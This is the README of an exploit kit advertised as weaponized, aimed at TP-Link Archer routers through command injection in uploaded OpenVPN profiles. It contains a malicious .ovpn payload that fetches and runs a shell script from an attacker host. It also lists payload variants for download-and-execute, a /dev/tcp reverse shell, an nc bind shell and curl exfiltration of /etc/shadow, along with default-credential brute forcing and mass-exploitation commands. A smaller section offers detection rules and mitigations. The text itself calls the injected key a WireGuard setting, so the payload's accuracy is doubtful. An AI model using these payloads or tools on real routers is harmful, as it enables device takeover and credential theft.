# CVE-2026-9151 TP-Link Archer Exploit Kit (Upgraded)

**CVE-2026-9151 — TP-Link Archer Series OS Command Injection via VPN Client Config**  
**Military-Grade Multi-Router RCE via Malicious .ovpn Upload**

![Severity](https://img.shields.io/badge/Severity-Critical-red)
![CVSS](https://img.shields.io/badge/CVSS-9.8-red)
![Status](https://img.shields.io/badge/Status-Weaponized-red)

---

## Overview

CVE-2026-9151 is a critical OS command injection vulnerability in **TP-Link Archer Series** routers (AX12, AX17, AX18, AX1300, and similar models). The vulnerability exists in the VPN client configuration management functionality, allowing authenticated attackers to execute arbitrary system commands via malicious OpenVPN configuration files.

### Affected Models

| Model | Firmware | VPN Support |
|-------|----------|-------------|
| Archer AX12 v1 | Multiple | OpenVPN client |
| Archer AX17 v1 | Multiple | OpenVPN client |
| Archer AX18 v1 | Multiple | OpenVPN/WireGuard |
| Archer AX1300 v1.6 | Multiple | OpenVPN client |

### Exploitation Mechanism

1. **Authenticate** to router web interface (default credentials: admin/admin)
2. **Generate malicious OpenVPN config** with `PostUp` command injection
3. **Upload config** via VPN client config upload endpoint
4. **Apply config** → Command executes with router privileges
5. **Achieve RCE** via reverse shell or arbitrary command execution

---

## Technical Details

### Vulnerable Code Flow

```
Client uploads .ovpn file
         ↓
Router parses OpenVPN config via OpenVPN binary or custom parser
         ↓
Parser extracts PostUp/up/script directives
         ↓
System executes PostUp via system() or popen()
         ↓
COMMAND INJECTION → RCE
```

### Malicious Configuration Payload

**PostUp Injection Payload:**
```ovpn
client
dev tun
proto udp
remote attacker-ip 4444
resolv-retry infinite
nobind
persist-key
persist-tun
remote-cert-tls server
cipher AES-256-GCM
auth SHA512
verb 3

; Reconnaissance commands
whoami
id
cat /etc/passwd

PostUp=curl http://attacker-ip:8000/shell.sh|sh
```

**Alternative Payload Patterns:**

| Payload Type | PostUp/script | Use Case |
|-------------|---------------|----------|
| **Download & Execute** | `PostUp=wget http://lh:8000/s -O /tmp/s && chmod +x /tmp/s && /tmp/s` | Custom implant delivery |
| **Reverse Shell** | `PostUp=bash -c 'bash -i >& /dev/tcp/lh/lp 0>&1'` | Interactive access |
| **Bind Shell** | `PostUp=nc -l -p 4444 -e /bin/sh` | Direct connection |
| **Data Exfil** | `PostUp=curl -F"file=@/etc/shadow" http://lh:8000/` | Credential theft |

---

## Attack Surface Analysis

### Router Attack Surface

| Component | Exposure | Authentication |
|-----------|----------|----------------|
| Web Management UI | HTTP/HTTPS | Default creds (admin/admin) |
| VPN Client Config | Authenticated | Same as web UI |
| UPnP/NAT-PMP | Often enabled | No auth |
| WPS | Often enabled | PIN brute force |

### Default Credentials

Most TP-Link Archer models ship with:
- **Username:** `admin`
- **Password:** `admin` (or blank)

The scanner automatically tests common credential pairs before exploitation.

---

## Repository Structure

```
tplink_archer_20269151_upgraded/
├── requirements.txt          # Python dependencies
├── scanner.py                # Async scanner with VPN endpoint detection
├── exploit.py                # Multi-router exploitation framework
└── README.md                 # This file
```

---

## Quick Start

### 1. Install Dependencies

```bash
python3.11 -m venv .venv
source .venv/bin/activate
pip install --upgrade pip
pip install -r requirements.txt
```

### 2. Reconnaissance Scan

```bash
# CIDR sweep for Archer routers
python scanner.py -n 192.168.1.0/24 -o scan_results.json

# Single target
python scanner.py -t 192.168.1.1

# Target list
python scanner.py -f targets.txt --threads 200

# Sample output:
# Target: 192.168.1.1
# Status: VULNERABLE (confidence: 85%)
#   [VPN] /cgi-bin/luci/admin/vpn/client
#   [VPN] /cgi-bin/luci/admin/vpn/client/upload
#   [VPN] /cgi-bin/luci/admin/vpn/client/apply
#   → http/80: TP-Link Archer AX12 Web UI
```

### 3. Exploitation

```bash
# Single router with reverse shell
python exploit.py -t 192.168.1.1 --lhost 10.0.0.5 --lport 4444

# Custom credentials
python exploit.py -t 192.168.1.1 -u admin -p mypassword --lhost 10.0.0.5 --lport 4444

# Mass exploitation
python exploit.py -f targets.txt --lhost 10.0.0.5 -o results.json -w 20

# HTTPS target
python exploit.py -t 192.168.1.1 --ssl --lhost 10.0.0.5 --lport 4444

# Alternative payload types
python exploit.py -t 192.168.1.1 --lhost 10.0.0.5 --payload-type shell_inline
```

---

## Exploit Module API

### Direct Function Calls

```python
from exploit import (
    exploit_cve2026_9151,
    generate_malicious_ovpn,
    generate_alternative_payloads,
    AuthManager,
    Target,
)

# Generate malicious config
ovpn = generate_malicious_ovpn("10.0.0.5", 4444)
print(ovpn)

# Generate multiple payload variants
payloads = generate_alternative_payloads("10.0.0.5", 4444)
for p in payloads:
    print(f"{p['name']}: {p['content'][:100]}")

# Single target exploitation
ok, details, config_id = exploit_cve2026_9151(
    "192.168.1.1",
    lhost="10.0.0.5",
    lport=4444,
    username="admin",
    password="admin",
    use_ssl=False
)

# Using AuthManager directly
target = Target(ip="192.168.1.1", port=80, ssl=False)
auth = AuthManager(target)
ok = auth.authenticate("admin", "admin")
```

---

## Exploitation Flow

### Step-by-Step Exploitation

```
[1] Target Discovery
    → Scan network for TP-Link Archer web interfaces
    → Identify VPN endpoints

[2] Authentication
    → Try default credentials (admin/admin)
    → Maintain session with CSRF token handling

[3] Malicious Config Generation
    → Generate .ovpn with PostUp command injection
    → Multiple payload variants for reliability

[4] Config Upload
    → POST to /cgi-bin/luci/admin/vpn/client/upload
    → Content-Type: multipart/form-data (boundary-delimited body)

[5] Config Activation
    → POST to /cgi-bin/luci/admin/vpn/client/apply
    → Triggers PostUp script execution

[6] Command Execution
    → Commands run as router root/admin
    → Reverse shell established
    → Persistent access achieved
```

---

## Detection & Mitigation

### Network Indicators

| Indicator | Description |
|-----------|-------------|
| HTTP POST `/cgi-bin/luci/admin/vpn/client/upload` | Config upload attempt |
| HTTP POST `/cgi-bin/luci/admin/vpn/client/apply` | Config activation |
| `PostUp=` in an uploaded OpenVPN config | Command injection indicator; `PostUp=` is a WireGuard-style key, not an OpenVPN directive, so it has no legitimate reason to appear in an `.ovpn` file |
| Unexpected outbound connections initiated by the router itself | Reverse shell/DNS callback |

### YARA Rule

As written, the condition `any of them` is broad: three of the four strings occur in ordinary LuCI traffic and in benign OpenVPN profiles, so only `$postup` is specific to the payload. Because `PostUp=` is a WireGuard-style key rather than an OpenVPN directive, its presence inside an `.ovpn` file is the usable discriminator.

```yara
rule Archer_CVE_2026_9151_Payload {
    strings:
        $postup = "PostUp=" nocase         // injected key from the payload; the one payload-specific string
        $ovpn = ".ovpn" nocase             // generic: matches any OpenVPN profile
        $vpn_client = "vpn/client" nocase  // generic: the VPN client UI path
        $admin = "/cgi-bin/luci" nocase    // generic: every LuCI request
    condition:
        any of them                        // broad; weight alerting on $postup
}
```
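A defender-side check for the indicators in the table above, added here as an example and not part of this repository's scanner or exploit code: it flags script-executing directives in an uploaded profile body (assumed already extracted from the multipart request) and maps POSTs to the upload and apply endpoints to an alert level. The hook names are OpenVPN's standard script directives; the sample profile is constructed.

```python
import re

# OpenVPN directives that run a script when a profile is used, plus the
# WireGuard-style "PostUp=" key that the payload above injects.
SCRIPT_HOOKS = {"up", "down", "route-up", "route-pre-down", "ipchange", "tls-verify",
                "client-connect", "client-disconnect", "learn-address", "auth-user-pass-verify"}
UPLOAD_PATH = "/cgi-bin/luci/admin/vpn/client/upload"
APPLY_PATH = "/cgi-bin/luci/admin/vpn/client/apply"

def find_script_hooks(ovpn_text):
    """Return (line_no, directive, argument) for every line that would execute code."""
    hits = []
    for no, raw in enumerate(ovpn_text.splitlines(), 1):
        line = raw.strip()
        if not line or line[0] in "#;":              # blank line or comment
            continue
        m = re.match(r"(?i)postup\s*=\s*(.*)", line)  # the injected key itself
        if m:
            hits.append((no, "PostUp", m.group(1)))
            continue
        word, _, rest = line.partition(" ")
        word, rest = word.lower(), rest.strip()
        if word in SCRIPT_HOOKS:
            hits.append((no, word, rest))
        elif word == "script-security" and rest.isdigit() and int(rest) >= 2:
            hits.append((no, word, rest))             # level 2+ lets the hooks above run
    return hits

def triage_request(method, path, uploaded_config=""):
    """Map one management-plane request to an alert level from the indicator table."""
    if method.upper() != "POST":
        return "ignore"
    if path == APPLY_PATH:
        return "notice"        # activation; correlate with the preceding upload
    if path != UPLOAD_PATH:
        return "ignore"
    hooks = find_script_hooks(uploaded_config)
    if any(d != "script-security" for _, d, _ in hooks):
        return "critical"      # a command runs on the router once the profile is applied
    return "review" if hooks else "accept"

# Constructed sample upload (not a capture): an ordinary client profile with a
# PostUp line appended, mirroring the payload shape shown above.
SAMPLE_UPLOAD = """client
dev tun
remote vpn.example.test 1194
PostUp=touch /tmp/marker
"""
```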

### Mitigations

1. **Immediate**: Change the default admin credentials
2. **Firmware**: Update to the latest TP-Link firmware release
3. **Network**: Place the router's management interface on an isolated management VLAN
4. **VPN**: Disable the VPN client functionality if it is not required
5. **WAF**: Block the VPN config upload and apply endpoints from external sources
6. **Monitoring**: Alert on VPN config changes and `PostUp` patterns in uploaded profiles

---

## Weaponization Features

| Feature | Implementation |
|---------|----------------|
| **Multi-Router Parallel Exploit** | ThreadPoolExecutor with configurable workers |
| **Auto-Auth** | CSRF token extraction, credential brute forcing |
| **Payload Variants** | 3 different PostUp injection patterns |
| **Router Fingerprinting** | Archer model detection via HTTP responses |
| **Config ID Auto-Discovery** | Parses existing configs or uses predictable IDs |
| **Session Persistence** | Maintains authenticated session throughout exploit chain |

---

## Legal & Ethics

This toolkit is provided for:
- Authorized penetration testing of infrastructure you own
- CISA/NCC/NCSC-aligned defensive research
- Detection rule development and purple-team exercises
- Red team / bug bounty programmes with explicit written scope

**Unauthorized use against systems you do not own is a criminal offence** under CFAA (US), Computer Misuse Act (UK), GDPR Art. 32 (EU), and equivalent legislation worldwide.

TP-Link and Archer are trademarks of TP-Link Technologies Co., Ltd. No endorsement by TP-Link is implied or intended.

---

## References

| CVE | Description |
|-----|-------------|
| CVE-2026-9151 | TP-Link Archer Series OS Command Injection via VPN Client Config |

---

## Version History

| Version | Date | Changes |
|---------|------|---------|
| 2.0.0 | 2026-06-13 | Complete rewrite: async scanner, CSRF-aware auth, multiple payload types |
| 1.0.0 | 2026-06-11 | Initial release (basic config upload exploit) |

---

## Author

Advanced Persistent Security Research  
Military-grade exploit engineering for authorized assessment only.